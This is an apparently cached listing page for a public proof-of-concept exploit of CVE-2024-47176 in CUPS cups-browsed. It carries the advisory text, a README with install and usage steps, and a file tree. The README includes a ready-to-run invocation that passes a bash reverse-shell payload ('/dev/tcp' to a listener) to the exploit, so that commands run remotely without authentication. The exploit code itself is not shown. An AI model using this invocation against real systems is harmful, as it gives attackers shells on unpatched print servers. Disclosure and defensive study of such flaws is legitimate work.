CVE-2024-47176 PoC — cups-browsed binds to `INADDR_ANY:631`, trusting any packet from any source

Source

https://github.com/pearlmansara/CVE-2024-47176-CUPS

Associated Vulnerability

Title:cups-browsed binds to `INADDR_ANY:631`, trusting any packet from any source (CVE-2024-47176)
Description:CUPS is a standards-based, open-source printing system, and `cups-browsed` contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. `cups-browsed` binds to `INADDR_ANY:631`, causing it to trust any packet from any source, and can cause the `Get-Printer-Attributes` IPP request to an attacker controlled URL. When combined with other vulnerabilities, such as CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, an attacker can execute arbitrary commands remotely on the target machine without authentication when a malicious printer is printed to.

Readme

# CVE-2024-47176 - CUPS Exploit

This exploit leverages a vulnerability in CUPS to execute arbitrary commands on a remote host.

## Installation

To install the required dependencies, run:

```bash
pip install -r requirements.txt
```
## Exploit

```bash
python cups.py <listening host> <remote host> <command>
```

```bash
python cups.py 10.10.10.10 10.10.10.11 'bash -c "bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
```

File Snapshot


 [4.0K]  /data/pocs/df1b6f713aa884c52d21c0606fc2cb2d42e58bfc
├── [7.3K]  cups.py
├── [ 420]  README.md
└── [  10]  requirements.txt

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!